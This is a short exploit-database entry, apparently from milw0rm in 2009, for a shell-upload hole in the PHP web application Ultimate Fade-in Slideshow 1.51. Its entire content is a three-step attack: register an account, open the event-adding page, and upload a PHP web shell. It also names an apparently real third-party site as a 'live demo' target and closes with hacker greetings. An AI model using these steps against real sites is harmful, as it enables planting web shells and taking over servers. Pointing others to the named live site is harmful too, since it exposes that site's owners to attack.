Ultimate Fade-in Slideshow 1.51 - Arbitrary File Upload

Author: NeX HaCkEr
type: webapps
platform: php
port: 
date_added: 2009-08-17 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

==================

NaMe: Ultimate Fade-in slideshow 1.51  <= Shell Upload Vulnerability
Author : NeX HaCkeR
Contact: c2l@hotmail.com

==================

Script site : http://www.dynamicdrive.com

==================

ExplOiT:

1: register in site

http://www.xxx.com/path/user_register.php

2: go to your Add New Events

http://www.xxx.com/path/events_uadd.php

Now upload shell.php

==================

Live DemO:

http://www.deals2cops.com



+========================================================+
|
| Greetz.: ~ CrazyMaN ~ Dr.KAsBeR ~ DaMi ~
|               And All Friends!!!!                                         |
+========================================================+

# milw0rm.com [2009-08-18]